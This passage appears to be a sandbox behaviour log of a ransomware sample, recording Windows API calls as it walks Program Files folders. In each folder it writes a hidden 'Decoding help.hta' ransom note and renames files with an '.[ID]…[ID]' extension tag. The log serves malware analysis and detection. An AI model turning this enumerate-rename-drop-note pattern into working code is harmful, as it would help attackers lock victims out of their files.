Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*" [0054.521] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*") returned 73 [0054.521] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\Decoding help.hta" [0054.521] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\en-us\\decoding help.hta")) returned 0xffffffff [0054.522] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0054.522] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xcc8fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xcc8fcf8, lpOverlapped=0x0) returned 0 [0054.522] CloseHandle (hObject=0xffffffff) returned 0 [0054.522] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0054.522] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MSTTSLoc.dll.mui") returned -1 [0054.522] lstrlenW (lpString="MSTTSLoc.dll.mui") returned 16 [0054.522] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*" [0054.522] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*") returned 73 [0054.522] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\", lpString2="MSTTSLoc.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSLoc.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSLoc.dll.mui" [0054.522] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSLoc.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSLoc.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSLoc.dll.mui" [0054.522] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSLoc.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSLoc.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSLoc.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0054.522] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSLoc.dll.mui" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\en-us\\msttsloc.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSLoc.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\en-us\\msttsloc.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0054.522] FindNextFileW (in: hFindFile=0x6718b0, lpFindFileData=0xcc8fd30 | out: lpFindFileData=0xcc8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2c77e3, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xb5e9110, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xb2c77e3, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSTTSLoc.dll.mui", cAlternateFileName="")) returned 0 [0054.522] FindClose (in: hFindFile=0x6718b0 | out: hFindFile=0x6718b0) returned 1 Thread: id = 793 os_tid = 0xa34 [0054.518] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*", lpFindFileData=0x1261fd30 | out: lpFindFileData=0x1261fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ea1accb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea1accb, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671670 [0054.519] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.519] FindNextFileW (in: hFindFile=0x671670, lpFindFileData=0x1261fd30 | out: lpFindFileData=0x1261fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ea1accb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea1accb, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.519] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.519] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.519] FindNextFileW (in: hFindFile=0x671670, lpFindFileData=0x1261fd30 | out: lpFindFileData=0x1261fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd8f7490, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd8f7490, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="enu-dsk", cAlternateFileName="")) returned 1 [0054.519] lstrcmpW (lpString1=".", lpString2="enu-dsk") returned -1 [0054.519] lstrcmpW (lpString1="..", lpString2="enu-dsk") returned -1 [0054.519] lstrcmpiW (lpString1="windows", lpString2="enu-dsk") returned 1 [0054.519] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*" [0054.519] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*") returned 79 [0054.519] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\", lpString2="enu-dsk" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk" [0054.519] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*" [0054.519] GlobalMemoryStatus (in: lpBuffer=0x1261fd10 | out: lpBuffer=0x1261fd10) [0054.519] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x109d09b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x804 [0054.523] CloseHandle (hObject=0x804) returned 1 [0054.523] FindNextFileW (in: hFindFile=0x671670, lpFindFileData=0x1261fd30 | out: lpFindFileData=0x1261fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7b89235, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xf7b89235, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x9fa0a390, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x43200, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSTTSFrontendENU.dll", cAlternateFileName="")) returned 1 [0054.523] lstrcpyW (in: lpString1=0x97a23e0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*" [0054.523] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*") returned 79 [0054.523] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\Decoding help.hta" [0054.523] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\decoding help.hta")) returned 0xffffffff [0054.523] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0054.524] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1261fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1261fcf8, lpOverlapped=0x0) returned 0 [0054.524] CloseHandle (hObject=0xffffffff) returned 0 [0054.524] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0054.524] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MSTTSFrontendENU.dll") returned -1 [0054.524] lstrlenW (lpString="MSTTSFrontendENU.dll") returned 20 [0054.524] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*" [0054.524] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*") returned 79 [0054.524] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\", lpString2="MSTTSFrontendENU.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSFrontendENU.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSFrontendENU.dll" [0054.524] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSFrontendENU.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSFrontendENU.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSFrontendENU.dll" [0054.524] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSFrontendENU.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSFrontendENU.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSFrontendENU.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0054.524] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSFrontendENU.dll" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\msttsfrontendenu.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSFrontendENU.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\msttsfrontendenu.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0054.524] FindNextFileW (in: hFindFile=0x671670, lpFindFileData=0x1261fd30 | out: lpFindFileData=0x1261fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2bbb36, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xc60371c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xc2bbb36, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSTTSLoc.dll.mui", cAlternateFileName="")) returned 1 [0054.524] lstrcpyW (in: lpString1=0x97a23e0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*" [0054.524] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*") returned 79 [0054.524] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\Decoding help.hta" [0054.524] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\decoding help.hta")) returned 0xffffffff [0054.525] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0054.525] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1261fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1261fcf8, lpOverlapped=0x0) returned 0 [0054.525] CloseHandle (hObject=0xffffffff) returned 0 [0054.525] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0054.525] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MSTTSLoc.dll.mui") returned -1 [0054.525] lstrlenW (lpString="MSTTSLoc.dll.mui") returned 16 [0054.525] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*" [0054.525] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*") returned 79 [0054.525] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\", lpString2="MSTTSLoc.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSLoc.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSLoc.dll.mui" [0054.525] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSLoc.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSLoc.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSLoc.dll.mui" [0054.525] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSLoc.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSLoc.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSLoc.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0054.525] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSLoc.dll.mui" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\msttsloc.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSLoc.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\msttsloc.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0054.525] FindNextFileW (in: hFindFile=0x671670, lpFindFileData=0x1261fd30 | out: lpFindFileData=0x1261fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2bbb36, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xc60371c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xc2bbb36, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSTTSLoc.dll.mui", cAlternateFileName="")) returned 0 [0054.525] FindClose (in: hFindFile=0x671670 | out: hFindFile=0x671670) returned 1 Thread: id = 794 os_tid = 0x980 [0054.523] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*", lpFindFileData=0x14f5fd30 | out: lpFindFileData=0x14f5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22b43298, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6714f0 [0056.130] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.131] FindNextFileW (in: hFindFile=0x6714f0, lpFindFileData=0x14f5fd30 | out: lpFindFileData=0x14f5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22b43298, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.131] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.131] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.131] FindNextFileW (in: hFindFile=0x6714f0, lpFindFileData=0x14f5fd30 | out: lpFindFileData=0x14f5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22b43298, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="css", cAlternateFileName="")) returned 1 [0056.131] lstrcmpW (lpString1=".", lpString2="css") returned -1 [0056.131] lstrcmpW (lpString1="..", lpString2="css") returned -1 [0056.131] lstrcmpiW (lpString1="windows", lpString2="css") returned 1 [0056.484] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*" [0056.484] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*") returned 75 [0056.484] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\", lpString2="css" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css" [0056.484] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\*.*" [0056.484] GlobalMemoryStatus (in: lpBuffer=0x14f5fd10 | out: lpBuffer=0x14f5fd10) [0056.484] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2aa38e30, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x508 [0056.485] CloseHandle (hObject=0x508) returned 1 [0056.485] FindNextFileW (in: hFindFile=0x6714f0, lpFindFileData=0x14f5fd30 | out: lpFindFileData=0x14f5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x7c6, dwReserved0=0x0, dwReserved1=0x0, cFileName="gadget.xml", cAlternateFileName="")) returned 1 [0056.487] lstrcpyW (in: lpString1=0x2aa50e98, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*" [0056.487] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*") returned 75 [0056.487] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\Decoding help.hta" [0056.487] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\decoding help.hta")) returned 0xffffffff [0056.488] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa30 [0058.240] WriteFile (in: hFile=0xa30, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x14f5fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x14f5fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.241] CloseHandle (hObject=0xa30) returned 1 [0058.241] 